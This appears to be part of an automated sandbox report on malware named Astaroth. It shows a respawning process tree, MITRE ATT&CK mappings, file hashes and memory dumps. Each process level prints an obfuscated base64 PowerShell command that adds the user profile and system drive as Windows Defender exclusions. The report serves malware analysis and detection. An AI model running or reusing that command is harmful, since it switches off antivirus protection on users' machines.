        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        50⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6968
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        50⤵
        
        PID:6368
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        50⤵
        
        PID:11188
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6592
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        51⤵
        
        PID:5572
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        51⤵
        
        PID:7248
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        52⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6652
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        52⤵
        
        PID:6700
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        52⤵
        
        PID:7128
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        53⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5284
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        53⤵
        
        PID:6996
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        53⤵
        
        PID:7568
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        54⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6152
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        54⤵
        
        PID:5188
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        54⤵
        
        PID:6920
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        55⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7488
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        55⤵
        
        PID:8296
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        55⤵
        
        PID:7368
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        56⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8628
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        56⤵
        
        PID:8456
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        56⤵
        
        PID:9048
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        57⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6128
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        57⤵
        
        PID:7568
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        57⤵
        
        PID:11188
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        58⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8552
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        58⤵
        
        PID:3824
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        58⤵
        
        PID:6040
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="
        59⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8044
        
        C:\Users\Admin\AppData\Local\Temp\system.exe
        
        "C:\Users\Admin\AppData\Local\Temp\system.exe"
        59⤵
        
        PID:6828
        
        C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"
        59⤵
        
        PID:7708

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
ac4917a885cf6050b1a483e4bc4d2ea5

SHA1
b1c0a9f27bd21c6bbb8e9be70db8777b4a2a640f

SHA256
e39062a62c3c7617feeeff95ea8a0be51104a0d36f46e44eea22556fda74d8d9

SHA512
092c67a3ecae1d187cad72a8ea1ea37cb78a0cf79c2cd7fb88953e5990669a2e871267015762fd46d274badb88ac0c1d73b00f1df7394d89bed48a3a45c2ba3d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
60KB

MD5
535b473ec3e9c0fd5aad89062d7f20e8

SHA1
c900f90b3003452b975185c27bfb44c8f0b552c4

SHA256
f6bb190101537e41901392fb690045c5bf1cddaa954630e57c5d0b3410b2d6b0

SHA512
33f286b06e9198ca8ae5225c7796f0f176282e2386fa93a2450e1a65cdb235932ef8a0a778f6b16945f1496a5e12e3ba6e3905f02a47a9cbb92e14448f463c86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
23b7371a9b8662e17661d35d484211ed

SHA1
c9f83e685d35c5a6e6360e8e67f4d564eb737ee5

SHA256
1d39ff6613b02f75929d271db0e55452a42a560da36df2644269c45f0dd81e4d

SHA512
a2e87f64d9ff7fd91b7d76f7c953a6a9fb64d83c79637d6a745a3f42ab07b74a568fe0c7fa46de0106b6312d87975a36f750a42f31ccde2575394d80138b1422

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
a2c47ebd6f9c0c7a2b6dfd11134a32e7

SHA1
058941f5ecb2fc474ee8aff5de5d49717ef74727

SHA256
c73978c0ac93a83514b1eeae264e87e9e075c9b7bb4d655538218d37a11c35f6

SHA512
46ae110e07c640f2238ee7dd7bf04b7d98a6013863b2903e7b9f3e16d4c31a52ffb60bff0a640466934e12bbe6b0473c87a93aca3162a06e5f4c2d3b30d2b400

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
d59cf70b8ddf763470677e129c316274

SHA1
7dea93838860bcabce7d784c2ac40155e2467e7d

SHA256
87aea0f44a89f325be5db37b6d36a241c486fa27c4c332e84aa3a207ee0130a2

SHA512
343206be1fb5e26cd0facc9e0f58474ea4bfeb815a801202284da62c6ea92469fc8836a37dfd3ae9c018be995e61b88e09d21d8830f09b4698c2d6a184338911

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
dca12cb41dc85a3b12e1d1b4ba9ee9a5

SHA1
3a408fb4e15518049266b9161d759d9ae2caabb1

SHA256
255907c1f4d2e605a1ec9fa09c3a34b2d98a59e006a42d6980c236679664052e

SHA512
968f6a3c158f5c56f5828c4311a6fb274aa35ad72123eb5be7e179f425e7292488eca64800f257bae640b8fe1f05ece822e449fa23f652b13787a892d8d5c8b5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
156557f9f5b4a3e093c80c62b15987b3

SHA1
d42c6a2fb2a5ef7a5bcf8afa622f16c852fde12c

SHA256
6c15dc3c52d2a64cd99d91df2701c04ed005b65900be75f23459fad555558d3f

SHA512
5b4e0190fe2a863fe292b1e3f25a60b2337edc122ef08377c7f4a11c2c3b526419d39de0fd5e846c046ef047c98f7bc13e0cfe5ead9ccd0e0c50262e6b5b3acf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
6fa2ce1f781ef8b2283ac643098f55d2

SHA1
a6238114cc583316a4c6442d50d3a52be3f67f3a

SHA256
80e226f71dc46157fb1fba62d4276502cb4e9e18d9fe4d66d83bb611639a1e6b

SHA512
a559b90a5418e4e3908c3b0cdae3f77cd6d9d2407b517a598a5cb9e62a149626c9c3b9596f3011831f87bd659149d004cbbebf27abea870b1c31bee7250722db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
d870b47f0ec9514e878b2f180ce777b4

SHA1
67d35573848d06299c9e16d83ce605fa4f6c05b9

SHA256
0de7c2857096ad7edfa63eb668ef725a1340c20d1bbc3e50adbb59e78613abd4

SHA512
8aea7af34768d4dda8843b395ef41864f6fc0f37dd2d52bdb56fb6997fc4d2391dde6597c44ae505fafcd161ec537761e621e629bee3c069b6b40ac3b6978b73

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_socklxkz.54u.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\system.exe

Filesize
78KB

MD5
a6fd55f1f13b0b71ac19c900593f51d9

SHA1
6339d97a1a97ba2531551aba4cb06eedd9d7c12a

SHA256
431f51f4ab1544899916bace447a602dc21386310a92677e0e96d22ece2a7b56

SHA512
a161d6876e0df731130718b22c466b39d95508749311e2cc5579b2e629cf9838054421b03b47acc50e37c12dfe5ca0f8d0fc75a71dacaceb7d591193784101c2

Download Submit
memory/1560-302-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

Filesize
304KB

Download
memory/1888-149-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

Filesize
304KB

Download
memory/2232-138-0x0000000007B30000-0x0000000007BC6000-memory.dmp

Filesize
600KB

Download
memory/2232-108-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

Filesize
304KB

Download
memory/2232-159-0x0000000007AF0000-0x0000000007AFE000-memory.dmp

Filesize
56KB

Download
memory/2416-118-0x00000000072C0000-0x00000000072DA000-memory.dmp

Filesize
104KB

Download
memory/2416-58-0x0000000005F60000-0x0000000005F7E000-memory.dmp

Filesize
120KB

Download
memory/2416-90-0x00000000071B0000-0x0000000007254000-memory.dmp

Filesize
656KB

Download
memory/2416-16-0x0000000002740000-0x0000000002776000-memory.dmp

Filesize
216KB

Download
memory/2416-89-0x0000000006570000-0x000000000658E000-memory.dmp

Filesize
120KB

Download
memory/2416-117-0x0000000007900000-0x0000000007F7A000-memory.dmp

Filesize
6.5MB

Download
memory/2416-59-0x0000000006500000-0x000000000654C000-memory.dmp

Filesize
304KB

Download
memory/2416-120-0x0000000007350000-0x000000000735A000-memory.dmp

Filesize
40KB

Download
memory/2416-17-0x0000000005340000-0x000000000596A000-memory.dmp

Filesize
6.2MB

Download
memory/2416-80-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

Filesize
304KB

Download
memory/2416-140-0x00000000074D0000-0x00000000074E1000-memory.dmp

Filesize
68KB

Download
memory/2416-79-0x0000000007170000-0x00000000071A4000-memory.dmp

Filesize
208KB

Download
memory/2480-312-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

Filesize
304KB

Download
memory/2556-198-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

Filesize
304KB

Download
memory/2576-217-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

Filesize
304KB

Download
memory/2988-48-0x00000176D03D0000-0x00000176D08F8000-memory.dmp

Filesize
5.2MB

Download
memory/3416-129-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

Filesize
304KB

Download
memory/4956-21-0x0000000005420000-0x0000000005486000-memory.dmp

Filesize
408KB

Download
memory/4956-168-0x0000000007000000-0x0000000007015000-memory.dmp

Filesize
84KB

Download
memory/4956-22-0x0000000005590000-0x00000000058E7000-memory.dmp

Filesize
3.3MB

Download
memory/4956-20-0x0000000004D20000-0x0000000004D86000-memory.dmp

Filesize
408KB

Download
memory/4956-179-0x00000000070F0000-0x000000000710A000-memory.dmp

Filesize
104KB

Download
memory/4956-200-0x00000000070E0000-0x00000000070E8000-memory.dmp

Filesize
32KB

Download
memory/4956-91-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

Filesize
304KB

Download
memory/4956-19-0x0000000004B80000-0x0000000004BA2000-memory.dmp

Filesize
136KB

Download
memory/4968-189-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

Filesize
304KB

Download
memory/5004-12-0x00007FFE17283000-0x00007FFE17285000-memory.dmp

Filesize
8KB

Download
memory/5004-11-0x000001C976370000-0x000001C976388000-memory.dmp

Filesize
96KB

Download
memory/5004-13-0x000001C978AE0000-0x000001C978CA2000-memory.dmp

Filesize
1.8MB

Download
memory/5004-15-0x00007FFE17280000-0x00007FFE17D42000-memory.dmp

Filesize
10.8MB

Download
memory/5096-169-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

Filesize
304KB

Download
memory/5264-244-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

Filesize
304KB

Download
memory/5588-262-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

Filesize
304KB

Download
memory/5920-291-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

Filesize
304KB

Download
memory/6184-338-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

Filesize
304KB

Download
memory/6460-356-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

Filesize
304KB

Download
memory/6864-369-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

Filesize
304KB

Download